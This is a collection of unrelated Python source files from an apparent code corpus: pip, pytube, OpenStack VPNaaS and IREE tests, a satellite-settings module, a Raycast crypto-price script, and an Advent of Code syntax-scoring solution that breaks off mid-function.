return 'BigNum.h("' + self.hex() + '", ' + str(len(self.d)) + ')'
def normalize(self):
'''Removes all the trailing 0 (zero) digits in this number.
Returns self, for easy call chaining.
'''
while len(self.d) > 1 and self.d[-1] == Byte.zero():
self.d.pop()
return self
def is_normalized(self):
'''False if the number has at least one trailing 0 (zero) digit.'''
return len(self.d) == 1 or self.d[-1] != Byte.zero()
|
py | b41055c5606420b1463ace99a06e07cabc781376 | import fnmatch
import json
from os.path import basename
from pip._vendor.packaging.utils import canonicalize_name
from pytest import mark
def pip(script, command, requirement):
return script.pip(
command, '--prefer-binary', '--no-cache-dir',
'--use-feature=fast-deps', requirement,
allow_stderr_warning=True,
)
def assert_installed(script, names):
list_output = json.loads(script.pip('list', '--format=json').stdout)
installed = {canonicalize_name(item['name']) for item in list_output}
assert installed.issuperset(map(canonicalize_name, names))
@mark.network
@mark.parametrize(('requirement', 'expected'), (
('Paste==3.4.2', ('Paste', 'six')),
('Paste[flup]==3.4.2', ('Paste', 'six', 'flup')),
))
def test_install_from_pypi(requirement, expected, script):
pip(script, 'install', requirement)
assert_installed(script, expected)
@mark.network
@mark.parametrize(('requirement', 'expected'), (
('Paste==3.4.2', ('Paste-3.4.2-*.whl', 'six-*.whl')),
('Paste[flup]==3.4.2', ('Paste-3.4.2-*.whl', 'six-*.whl', 'flup-*')),
))
def test_download_from_pypi(requirement, expected, script):
result = pip(script, 'download', requirement)
created = list(map(basename, result.files_created))
assert all(fnmatch.filter(created, f) for f in expected)
@mark.network
def test_build_wheel_with_deps(data, script):
result = pip(script, 'wheel', data.packages/'requiresPaste')
created = list(map(basename, result.files_created))
assert fnmatch.filter(created, 'requiresPaste-3.1.4-*.whl')
assert fnmatch.filter(created, 'Paste-3.4.2-*.whl')
assert fnmatch.filter(created, 'six-*.whl')
|
py | b4105633ad4ce5e18d2f1a1bb816ee4120eb97da | from abc import ABC, abstractmethod
class Food(ABC):
@abstractmethod
def __init__(self, quantity: int):
self.quantity = quantity
class Vegetable(Food):
def __init__(self, quantity: int):
super().__init__(quantity)
class Fruit(Food):
def __init__(self, quantity: int):
super().__init__(quantity)
class Meat(Food):
def __init__(self, quantity: int):
super().__init__(quantity)
class Seed(Food):
def __init__(self, quantity: int):
super().__init__(quantity)
|
py | b410575ebfb6e9f6839c1a17cab8551d69f9e911 | from pyopteryx.utils.builder_utils import add_predecessor_precedence, add_successor_precedence
from pyopteryx.utils.xml_utils import get_by_id, get_action_type, check_and_retrieve_uid, \
create_activity_name_from_action
class AbstractActionFactory:
def __init__(self, action, task_activities, xml_cache, processor, mapping_cache):
self.action = action
self.processor = processor
self.task = processor.find("task")
self.entry_name = processor.find(".//entry").get("name")
self.task_activities = task_activities
self.task = processor.find("task")
self.reply_entry = task_activities.find("./reply-entry")
self.mapping_cache = mapping_cache
self.uid_string = check_and_retrieve_uid(mapping_cache=mapping_cache, processor=processor)
self.activity_name = create_activity_name_from_action(action=action, uid_string=self.uid_string)
self.xml_cache = xml_cache
def add_action(self):
"""
Add action to processor.
"""
pass
def _add_precedences(self, action, task_activities, activity_name):
"""
Add precedences for action depending on the type of action: normal and usage.
:param action: current action
:param task_activities: task_activities to add precedence to
:param activity_name: parsed action name for precedence activity
"""
# If action is usage action get predecessor from parameter "predecessor" and "successor"
predecessor_abstract_action_id = action.get("predecessor_AbstractAction")
successor_abstract_action_id = action.get("successor_AbstractAction")
predecessor_action = get_by_id(element=self.xml_cache.get_xml_tree(name="repository"),
element_id=predecessor_abstract_action_id)
successor_action = get_by_id(element=self.xml_cache.get_xml_tree(name="repository"),
element_id=successor_abstract_action_id)
# If action has predecessor add precedence
if predecessor_action is not None:
action_type = get_action_type(predecessor_action)
if action_type == 'SetVariableAction': # should already have been created, pass
pass
else:
add_predecessor_precedence(task_activities=task_activities,
predecessor_action=predecessor_action,
post_activity_name=activity_name,
mapping_cache=self.mapping_cache)
# If action has successor add precedence
if successor_action is not None:
action_type = get_action_type(successor_action)
# skip SetVariableAction and take successor of SetVariableAction as successor of current action
# SetVariableAction not supported by Peropteryx + LQNS, see documentation
if action_type == 'SetVariableAction':
second_level_successor_id = successor_action.get('successor_AbstractAction')
second_level_successor = get_by_id(element=self.xml_cache.get_xml_tree(name="repository"),
element_id=second_level_successor_id)
add_successor_precedence(task_activities=task_activities,
successor_action=second_level_successor,
pre_activity_name=activity_name,
mapping_cache=self.mapping_cache)
else:
add_successor_precedence(task_activities=task_activities,
successor_action=successor_action,
pre_activity_name=activity_name,
mapping_cache=self.mapping_cache)
|
py | b410579572a056744c5b4275e8b2db553b7f51ed | # -*- coding: utf-8 -*-
#
# The MIT License (MIT)
#
# Copyright (c) 2018-2021 Dmitriy Yefremov
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Author: Dmitriy Yefremov
#
from app.commons import run_task
from app.settings import SettingsType
from .ecommons import Service, Satellite, Transponder, Bouquet, Bouquets, is_transponder_valid
from .enigma.blacklist import get_blacklist, write_blacklist
from .enigma.bouquets import to_bouquet_id, BouquetsWriter, BouquetsReader
from .enigma.lamedb import get_services as get_enigma_services, write_services as write_enigma_services
from .iptv import parse_m3u
from .neutrino.bouquets import get_bouquets as get_neutrino_bouquets, write_bouquets as write_neutrino_bouquets
from .neutrino.services import get_services as get_neutrino_services, write_services as write_neutrino_services
from .satxml import get_satellites, write_satellites
def get_services(data_path, s_type, format_version):
if s_type is SettingsType.ENIGMA_2:
return get_enigma_services(data_path, format_version)
elif s_type is SettingsType.NEUTRINO_MP:
return get_neutrino_services(data_path)
@run_task
def write_services(path, channels, s_type, format_version):
if s_type is SettingsType.ENIGMA_2:
write_enigma_services(path, channels, format_version)
elif s_type is SettingsType.NEUTRINO_MP:
write_neutrino_services(path, channels)
def get_bouquets(path, s_type):
if s_type is SettingsType.ENIGMA_2:
return BouquetsReader(path).get()
elif s_type is SettingsType.NEUTRINO_MP:
return get_neutrino_bouquets(path)
def write_bouquet(path, bq, s_type):
if s_type is SettingsType.ENIGMA_2:
writer = BouquetsWriter(path, None)
writer.write_bouquet(f"{path}userbouquet.{bq.name}.{bq.type}", bq.name, bq.services)
elif s_type is SettingsType.NEUTRINO_MP:
from .neutrino.bouquets import write_bouquet
write_bouquet(path, bq)
@run_task
def write_bouquets(path, bouquets, s_type, force_bq_names=False):
if s_type is SettingsType.ENIGMA_2:
BouquetsWriter(path, bouquets, force_bq_names).write()
elif s_type is SettingsType.NEUTRINO_MP:
write_neutrino_bouquets(path, bouquets)
if __name__ == "__main__":
pass
|
py | b41057e341d679f47d6cecd295be2aa802915e3e | #!/usr/bin/env python3
# Required parameters:
# @raycast.schemaVersion 1
# @raycast.title Crypto
# @raycast.mode inline
# @raycast.refreshTime 5m
# @raycast.packageName Money
# Optional parameters:
# @raycast.icon 💰
# Documentation:
# @raycast.description Gets crypto prices from Binance
# @raycast.author Manan Mehta
# @raycast.authorURL https://github.com/mehtamanan
import json
from urllib.request import urlopen
import sys
# Other symbols
# ETHUSDT - Ethereum / USD
# LTCUSDT - Litcoin / USD
# LTCBTC - Litecoin / Bitcoin
# ADAUSDT - Cardano / USD
# BNBUSDT - Binance Coin / USD
# DOTUSDT - Polkadot / USD
# XRPUSDT - Ripple / USD
SYMBOLS = [ 'BTCUSDT', 'ETHBTC' ]
# Fetch tickers from Binance for selected symbols
responses = []
for symbol in SYMBOLS:
try:
with urlopen('https://api.binance.com/api/v3/ticker/24hr?symbol={}'.format(symbol)) as f:
responses.append(json.load(f))
except:
print('Failed loading prices..')
sys.exit(0)
# Create and print inline message
messages = []
for r in responses:
messages.append('{}: {:.3f} ({:+.2f}%)'.format(r['symbol'], float(r['askPrice']), float(r['priceChangePercent'])))
print(' '.join(messages))
|
py | b410583edd999cab45eb71065425c24cb52e46bb | # -*- coding: utf-8 -*-
"""Unit tests for the :module:`extract <extract>` module."""
from datetime import datetime
import pytest
from pytube import extract
from pytube.exceptions import RegexMatchError
def test_extract_video_id():
url = "https://www.youtube.com/watch?v=2lAe1cqCOXo"
video_id = extract.video_id(url)
assert video_id == "2lAe1cqCOXo"
def test_info_url(age_restricted):
video_info_url = extract.video_info_url_age_restricted(
video_id="QRS8MkLhQmM", embed_html=age_restricted["embed_html"],
)
expected = (
"https://youtube.com/get_video_info?video_id=QRS8MkLhQmM&eurl"
"=https%3A%2F%2Fyoutube.googleapis.com%2Fv%2FQRS8MkLhQmM&sts="
)
assert video_info_url == expected
def test_info_url_age_restricted(cipher_signature):
video_info_url = extract.video_info_url(
video_id=cipher_signature.video_id,
watch_url=cipher_signature.watch_url,
)
expected = (
"https://youtube.com/get_video_info?video_id=2lAe1cqCOXo"
"&ps=default&eurl=https%253A%2F%2Fyoutube.com%2Fwatch%253Fv%"
"253D2lAe1cqCOXo&hl=en_US"
)
assert video_info_url == expected
def test_js_url(cipher_signature):
expected = (
"https://youtube.com/s/player/9b65e980/player_ias.vflset/en_US/base.js"
)
result = extract.js_url(cipher_signature.watch_html)
assert expected == result
def test_age_restricted(age_restricted):
assert extract.is_age_restricted(age_restricted["watch_html"])
def test_non_age_restricted(cipher_signature):
assert not extract.is_age_restricted(cipher_signature.watch_html)
def test_is_private(private):
assert extract.is_private(private['watch_html'])
def test_not_is_private(cipher_signature):
assert not extract.is_private(cipher_signature.watch_html)
def test_recording_available(cipher_signature):
assert extract.recording_available(cipher_signature.watch_html)
def test_publish_date(cipher_signature):
expected = datetime(2019, 12, 5)
assert cipher_signature.publish_date == expected
assert extract.publish_date('') is None
def test_not_recording_available(missing_recording):
assert not extract.recording_available(missing_recording['watch_html'])
def test_mime_type_codec():
mime_type, mime_subtype = extract.mime_type_codec(
'audio/webm; codecs="opus"'
)
assert mime_type == "audio/webm"
assert mime_subtype == ["opus"]
def test_mime_type_codec_with_no_match_should_error():
with pytest.raises(RegexMatchError):
extract.mime_type_codec("audio/webm")
def test_get_ytplayer_config_with_no_match_should_error():
with pytest.raises(RegexMatchError):
extract.get_ytplayer_config("")
def test_get_ytplayer_js_with_no_match_should_error():
with pytest.raises(RegexMatchError):
extract.get_ytplayer_js("")
def test_signature_cipher_does_not_error(stream_dict):
config_args = extract.get_ytplayer_config(stream_dict)['args']
extract.apply_descrambler(config_args, "url_encoded_fmt_stream_map")
assert "s" in config_args["url_encoded_fmt_stream_map"][0].keys()
def test_initial_data_missing():
with pytest.raises(RegexMatchError):
extract.initial_data('')
def test_initial_data(stream_dict):
initial_data = extract.initial_data(stream_dict)
assert 'contents' in initial_data
|
py | b41059cb54fe81a16b45a5e1406a4f7c20e03d47 | # Copyright 2013, Mirantis Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Tatiana Mazur
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
from neutronclient.v2_0 import client
neutronclient = client.Client
class VPNaasApiTests(test.APITestCase):
@test.create_stubs({neutronclient: ('create_vpnservice',)})
def test_vpnservice_create(self):
vpnservice1 = self.api_vpnservices.first()
form_data = {
'name': vpnservice1['name'],
'description': vpnservice1['description'],
'subnet_id': vpnservice1['subnet_id'],
'router_id': vpnservice1['router_id'],
'admin_state_up': vpnservice1['admin_state_up']
}
vpnservice = {'vpnservice': self.api_vpnservices.first()}
neutronclient.create_vpnservice(
{'vpnservice': form_data}).AndReturn(vpnservice)
self.mox.ReplayAll()
ret_val = api.vpn.vpnservice_create(self.request, **form_data)
self.assertIsInstance(ret_val, api.vpn.VPNService)
@test.create_stubs({neutronclient: ('list_vpnservices',
'list_ipsec_site_connections'),
api.neutron: ('subnet_list', 'router_list')})
def test_vpnservice_list(self):
vpnservices = {'vpnservices': self.vpnservices.list()}
vpnservices_dict = {'vpnservices': self.api_vpnservices.list()}
subnets = self.subnets.list()
routers = self.routers.list()
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
neutronclient.list_vpnservices().AndReturn(vpnservices_dict)
api.neutron.subnet_list(self.request).AndReturn(subnets)
api.neutron.router_list(self.request).AndReturn(routers)
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
self.mox.ReplayAll()
ret_val = api.vpn.vpnservice_list(self.request)
for (v, d) in zip(ret_val, vpnservices['vpnservices']):
self.assertIsInstance(v, api.vpn.VPNService)
self.assertTrue(v.name, d.name)
self.assertTrue(v.id)
@test.create_stubs({neutronclient: ('show_vpnservice',
'list_ipsec_site_connections'),
api.neutron: ('subnet_get', 'router_get')})
def test_vpnservice_get(self):
vpnservice = self.vpnservices.first()
vpnservice_dict = {'vpnservice': self.api_vpnservices.first()}
subnet = self.subnets.first()
router = self.routers.first()
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
neutronclient.show_vpnservice(
vpnservice.id).AndReturn(vpnservice_dict)
api.neutron.subnet_get(self.request, subnet.id).AndReturn(subnet)
api.neutron.router_get(self.request, router.id).AndReturn(router)
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
self.mox.ReplayAll()
ret_val = api.vpn.vpnservice_get(self.request, vpnservice.id)
self.assertIsInstance(ret_val, api.vpn.VPNService)
@test.create_stubs({neutronclient: ('create_ikepolicy',)})
def test_ikepolicy_create(self):
ikepolicy1 = self.api_ikepolicies.first()
form_data = {
'name': ikepolicy1['name'],
'description': ikepolicy1['description'],
'auth_algorithm': ikepolicy1['auth_algorithm'],
'encryption_algorithm': ikepolicy1['encryption_algorithm'],
'ike_version': ikepolicy1['ike_version'],
'lifetime': ikepolicy1['lifetime'],
'phase1_negotiation_mode': ikepolicy1['phase1_negotiation_mode'],
'pfs': ikepolicy1['pfs']
}
ikepolicy = {'ikepolicy': self.api_ikepolicies.first()}
neutronclient.create_ikepolicy(
{'ikepolicy': form_data}).AndReturn(ikepolicy)
self.mox.ReplayAll()
ret_val = api.vpn.ikepolicy_create(self.request, **form_data)
self.assertIsInstance(ret_val, api.vpn.IKEPolicy)
@test.create_stubs({neutronclient: ('list_ikepolicies',
'list_ipsec_site_connections')})
def test_ikepolicy_list(self):
ikepolicies = {'ikepolicies': self.ikepolicies.list()}
ikepolicies_dict = {'ikepolicies': self.api_ikepolicies.list()}
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
neutronclient.list_ikepolicies().AndReturn(ikepolicies_dict)
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
self.mox.ReplayAll()
ret_val = api.vpn.ikepolicy_list(self.request)
for (v, d) in zip(ret_val, ikepolicies['ikepolicies']):
self.assertIsInstance(v, api.vpn.IKEPolicy)
self.assertTrue(v.name, d.name)
self.assertTrue(v.id)
@test.create_stubs({neutronclient: ('show_ikepolicy',
'list_ipsec_site_connections')})
def test_ikepolicy_get(self):
ikepolicy = self.ikepolicies.first()
ikepolicy_dict = {'ikepolicy': self.api_ikepolicies.first()}
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
neutronclient.show_ikepolicy(
ikepolicy.id).AndReturn(ikepolicy_dict)
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
self.mox.ReplayAll()
ret_val = api.vpn.ikepolicy_get(self.request, ikepolicy.id)
self.assertIsInstance(ret_val, api.vpn.IKEPolicy)
@test.create_stubs({neutronclient: ('create_ipsecpolicy',)})
def test_ipsecpolicy_create(self):
ipsecpolicy1 = self.api_ipsecpolicies.first()
form_data = {
'name': ipsecpolicy1['name'],
'description': ipsecpolicy1['description'],
'auth_algorithm': ipsecpolicy1['auth_algorithm'],
'encryption_algorithm': ipsecpolicy1['encryption_algorithm'],
'encapsulation_mode': ipsecpolicy1['encapsulation_mode'],
'lifetime': ipsecpolicy1['lifetime'],
'pfs': ipsecpolicy1['pfs'],
'transform_protocol': ipsecpolicy1['transform_protocol']
}
ipsecpolicy = {'ipsecpolicy': self.api_ipsecpolicies.first()}
neutronclient.create_ipsecpolicy(
{'ipsecpolicy': form_data}).AndReturn(ipsecpolicy)
self.mox.ReplayAll()
ret_val = api.vpn.ipsecpolicy_create(self.request, **form_data)
self.assertIsInstance(ret_val, api.vpn.IPSecPolicy)
@test.create_stubs({neutronclient: ('list_ipsecpolicies',
'list_ipsec_site_connections')})
def test_ipsecpolicy_list(self):
ipsecpolicies = {'ipsecpolicies': self.ipsecpolicies.list()}
ipsecpolicies_dict = {'ipsecpolicies': self.api_ipsecpolicies.list()}
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
neutronclient.list_ipsecpolicies().AndReturn(ipsecpolicies_dict)
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
self.mox.ReplayAll()
ret_val = api.vpn.ipsecpolicy_list(self.request)
for (v, d) in zip(ret_val, ipsecpolicies['ipsecpolicies']):
self.assertIsInstance(v, api.vpn.IPSecPolicy)
self.assertTrue(v.name, d.name)
self.assertTrue(v.id)
@test.create_stubs({neutronclient: ('show_ipsecpolicy',
'list_ipsec_site_connections')})
def test_ipsecpolicy_get(self):
ipsecpolicy = self.ipsecpolicies.first()
ipsecpolicy_dict = {'ipsecpolicy': self.api_ipsecpolicies.first()}
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
neutronclient.show_ipsecpolicy(
ipsecpolicy.id).AndReturn(ipsecpolicy_dict)
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
self.mox.ReplayAll()
ret_val = api.vpn.ipsecpolicy_get(self.request, ipsecpolicy.id)
self.assertIsInstance(ret_val, api.vpn.IPSecPolicy)
@test.create_stubs({neutronclient: ('create_ipsec_site_connection',)})
def test_ipsecsiteconnection_create(self):
ipsecsiteconnection1 = self.api_ipsecsiteconnections.first()
form_data = {
'name': ipsecsiteconnection1['name'],
'description': ipsecsiteconnection1['description'],
'dpd': ipsecsiteconnection1['dpd'],
'ikepolicy_id': ipsecsiteconnection1['ikepolicy_id'],
'initiator': ipsecsiteconnection1['initiator'],
'ipsecpolicy_id': ipsecsiteconnection1['ipsecpolicy_id'],
'mtu': ipsecsiteconnection1['mtu'],
'peer_address': ipsecsiteconnection1['peer_address'],
'peer_cidrs': ipsecsiteconnection1['peer_cidrs'],
'peer_id': ipsecsiteconnection1['peer_id'],
'psk': ipsecsiteconnection1['psk'],
'vpnservice_id': ipsecsiteconnection1['vpnservice_id'],
'admin_state_up': ipsecsiteconnection1['admin_state_up']
}
ipsecsiteconnection = {'ipsec_site_connection':
self.api_ipsecsiteconnections.first()}
neutronclient.create_ipsec_site_connection(
{'ipsec_site_connection':
form_data}).AndReturn(ipsecsiteconnection)
self.mox.ReplayAll()
ret_val = api.vpn.ipsecsiteconnection_create(
self.request, **form_data)
self.assertIsInstance(ret_val, api.vpn.IPSecSiteConnection)
@test.create_stubs({neutronclient: ('list_ipsec_site_connections',
'list_ikepolicies',
'list_ipsecpolicies',
'list_vpnservices')})
def test_ipsecsiteconnection_list(self):
ipsecsiteconnections = {
'ipsec_site_connections': self.ipsecsiteconnections.list()}
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
ikepolicies_dict = {'ikepolicies': self.api_ikepolicies.list()}
ipsecpolicies_dict = {'ipsecpolicies': self.api_ipsecpolicies.list()}
vpnservices_dict = {'vpnservices': self.api_vpnservices.list()}
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
neutronclient.list_ikepolicies().AndReturn(ikepolicies_dict)
neutronclient.list_ipsecpolicies().AndReturn(ipsecpolicies_dict)
neutronclient.list_vpnservices().AndReturn(vpnservices_dict)
self.mox.ReplayAll()
ret_val = api.vpn.ipsecsiteconnection_list(self.request)
for (v, d) in zip(ret_val,
ipsecsiteconnections['ipsec_site_connections']):
self.assertIsInstance(v, api.vpn.IPSecSiteConnection)
self.assertTrue(v.name, d.name)
self.assertTrue(v.id)
@test.create_stubs({neutronclient: ('show_ipsec_site_connection',
'show_ikepolicy', 'show_ipsecpolicy',
'show_vpnservice')})
def test_ipsecsiteconnection_get(self):
ipsecsiteconnection = self.ipsecsiteconnections.first()
connection_dict = {'ipsec_site_connection':
self.api_ipsecsiteconnections.first()}
ikepolicy_dict = {'ikepolicy': self.api_ikepolicies.first()}
ipsecpolicy_dict = {'ipsecpolicy': self.api_ipsecpolicies.first()}
vpnservice_dict = {'vpnservice': self.api_vpnservices.first()}
neutronclient.show_ipsec_site_connection(
ipsecsiteconnection.id).AndReturn(connection_dict)
neutronclient.show_ikepolicy(
ipsecsiteconnection.ikepolicy_id).AndReturn(ikepolicy_dict)
neutronclient.show_ipsecpolicy(
ipsecsiteconnection.ipsecpolicy_id).AndReturn(ipsecpolicy_dict)
neutronclient.show_vpnservice(
ipsecsiteconnection.vpnservice_id).AndReturn(vpnservice_dict)
self.mox.ReplayAll()
ret_val = api.vpn.ipsecsiteconnection_get(self.request,
ipsecsiteconnection.id)
self.assertIsInstance(ret_val, api.vpn.IPSecSiteConnection)
|
py | b4105a687862b37d24f4b400c7bf360453ceac15 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from pyiree.tf.support import tf_test_utils
import string
import tensorflow.compat.v2 as tf
class StringsModule(tf.Module):
"""A Module for converting a set of ids to the concatenated string."""
def __init__(self):
wordparts = [str(c) for c in string.printable]
self.wordparts = tf.constant(wordparts, tf.string)
@tf.function(input_signature=[
tf.TensorSpec((None, None), dtype=tf.int32),
])
def print_ids(self, ids):
string_tensor = tf.strings.as_string(ids)
tf.print(string_tensor)
@tf.function(input_signature=[
tf.TensorSpec((None, None), dtype=tf.int32),
])
def strings_to_ids(self, ids):
wps = tf.gather(self.wordparts, ids)
return tf.strings.reduce_join(wps, 1)
@tf_test_utils.compile_modules(strings=StringsModule)
class StringsTest(tf_test_utils.SavedModelTestCase):
def test_print_ids(self):
input_ids = np.asarray(
[[12, 10, 29, 28, 94, 15, 24, 27, 94, 25, 21, 10, 34],
[13, 24, 16, 28, 94, 15, 24, 27, 94, 28, 29, 10, 34]])
self.modules.strings.all.print_ids(input_ids)
def test_strings_to_ids(self):
input_ids = np.asarray(
[[12, 10, 29, 28, 94, 15, 24, 27, 94, 25, 21, 10, 34],
[13, 24, 16, 28, 94, 15, 24, 27, 94, 28, 29, 10, 34]])
result = self.modules.strings.all.strings_to_ids(input_ids)
result.assert_all_equal()
if __name__ == "__main__":
if hasattr(tf, "enable_v2_behavior"):
tf.enable_v2_behavior()
tf.test.main()
|
py | b4105c51e007906f8d0231c9b58863d187b7b916 | import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.HAU/Sun-ExtA_8/udhr_Latn.HAU_Sun-ExtA_8.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
|
py | b4105cfba87b5fbb9f988ae6f288d6695187a46b | """
--- Day 10: Syntax Scoring ---
You ask the submarine to determine the best route out of the deep-sea cave, but it only replies:
Syntax error in navigation subsystem on line: all of them
All of them?! The damage is worse than you thought. You bring up a copy of the navigation subsystem (your puzzle input).
The navigation subsystem syntax is made of several lines containing chunks. There are one or more chunks on each line,
and chunks contain zero or more other chunks. Adjacent chunks are not separated by any delimiter;
if one chunk stops, the next chunk (if any) can immediately start.
Every chunk must open and close with one of four legal pairs of matching characters:
If a chunk opens with (, it must close with ).
If a chunk opens with [, it must close with ].
If a chunk opens with {, it must close with }.
If a chunk opens with <, it must close with >.
So, () is a legal chunk that contains no other chunks, as is [].
More complex but valid chunks include ([]), {()()()}, <([{}])>, [<>({}){}[([])<>]], and even (((((((((()))))))))).
Some lines are incomplete, but others are corrupted. Find and discard the corrupted lines first.
A corrupted line is one where a chunk closes with the wrong character - that is, where the characters
it opens and closes with do not form one of the four legal pairs listed above.
Examples of corrupted chunks include (], {()()()>, (((()))}, and <([]){()}[{}]). Such a chunk can appear anywhere
within a line, and its presence causes the whole line to be considered corrupted.
For example, consider the following navigation subsystem:
[({(<(())[]>[[{[]{<()<>>
[(()[<>])]({[<{<<[]>>(
{([(<{}[<>[]}>{[]{[(<()>
(((({<>}<{<{<>}{[]{[]{}
[[<[([]))<([[{}[[()]]]
[{[{({}]{}}([{[{{{}}([]
{<[[]]>}<{[{[{[]{()[[[]
[<(<(<(<{}))><([]([]()
<{([([[(<>()){}]>(<<{{
<{([{{}}[<[[[<>{}]]]>[]]
Some of the lines aren't corrupted, just incomplete; you can ignore these lines for now.
The remaining five lines are corrupted:
{([(<{}[<>[]}>{[]{[(<()> - Expected ], but found } instead.
[[<[([]))<([[{}[[()]]] - Expected ], but found ) instead.
[{[{({}]{}}([{[{{{}}([] - Expected ), but found ] instead.
[<(<(<(<{}))><([]([]() - Expected >, but found ) instead.
<{([([[(<>()){}]>(<<{{ - Expected ], but found > instead.
Stop at the first incorrect closing character on each corrupted line.
Did you know that syntax checkers actually have contests to see who can get the high score for syntax errors
in a file? It's true! To calculate the syntax error score for a line,
take the first illegal character on the line and look it up in the following table:
): 3 points.
]: 57 points.
}: 1197 points.
>: 25137 points.
In the above example, an illegal ) was found twice (2*3 = 6 points), an illegal ] was found once (57 points),
an illegal } was found once (1197 points), and an illegal > was found once (25137 points).
So, the total syntax error score for this file is 6+57+1197+25137 = 26397 points!
Find the first illegal character in each corrupted line of the navigation subsystem.
What is the total syntax error score for those errors?
--- Part Two ---
Now, discard the corrupted lines. The remaining lines are incomplete.
Incomplete lines don't have any incorrect characters - instead, they're missing some closing characters at the
end of the line. To repair the navigation subsystem, you just need to figure out the sequence of closing
characters that complete all open chunks in the line.
You can only use closing characters (), ], }, or >), and you must add them in the correct order so that only legal
pairs are formed and all chunks end up closed.
In the example above, there are five incomplete lines:
[({(<(())[]>[[{[]{<()<>> - Complete by adding }}]])})].
[(()[<>])]({[<{<<[]>>( - Complete by adding )}>]}).
(((({<>}<{<{<>}{[]{[]{} - Complete by adding }}>}>)))).
{<[[]]>}<{[{[{[]{()[[[] - Complete by adding ]]}}]}]}>.
<{([{{}}[<[[[<>{}]]]>[]] - Complete by adding ])}>.
Did you know that autocomplete tools also have contests? It's true! The score is determined by considering the
completion string character-by-character. Start with a total score of 0. Then, for each character,
multiply the total score by 5 and then increase the total score by the point value given for the
character in the following table:
): 1 point.
]: 2 points.
}: 3 points.
>: 4 points.
So, the last completion string above - ])}> - would be scored as follows:
Start with a total score of 0.
Multiply the total score by 5 to get 0, then add the value of ] (2) to get a new total score of 2.
Multiply the total score by 5 to get 10, then add the value of ) (1) to get a new total score of 11.
Multiply the total score by 5 to get 55, then add the value of } (3) to get a new total score of 58.
Multiply the total score by 5 to get 290, then add the value of > (4) to get a new total score of 294.
The five lines' completion strings have total scores as follows:
}}]])})] - 288957 total points.
)}>]}) - 5566 total points.
}}>}>)))) - 1480781 total points.
]]}}]}]}> - 995444 total points.
])}> - 294 total points.
Autocomplete tools are an odd bunch: the winner is found by sorting all of the scores and then taking the middle score.
(There will always be an odd number of scores to consider.) In this example,
the middle score is 288957 because there are the same number of scores smaller and larger than it.
Find the completion string for each incomplete line, score the completion strings, and sort the scores.
What is the middle score?
"""
from pathlib import Path
# Map of every opening token to it's closer
PAIRS = {"(": ")", "[": "]", "{": "}", "<": ">"}
# Map of the closing tokens to their syntax error score
SYNTAX_SCORES = {")": 3, "]": 57, "}": 1197, ">": 25137}
# Map of the closing tokens to their autocomplete score
COMPLETION_SCORES = {")": 1, "]": 2, "}": 3, ">": 4}
def first_illegal_character(text: str) -> str | None:
"""
Finds and returns the first illegal character in `text`
returning None if there no illegal characters.
"""
stack: list[str] = []
for char in text:
if char in PAIRS:
# If the character is an opening token, push it onto the stack
stack.append(char)
else:
# If the character is a closing token and the stack is empty
# or if it's not the closing token for what's at the top of the
# stack, return the character
if not stack or PAIRS[stack.pop()] != char:
return char
return None
def calculate_syntax_score(line: str) -> int:
"""
Calculates the syntax error score for a line.
"""
if illegal := first_illegal_character(line):
return SYNTAX_SCORES[illegal]
return 0
def complete(line: str) -> list[str]:
"""
Figures out what tokens you need to complete the line
and returns them in a list of the right order
"""
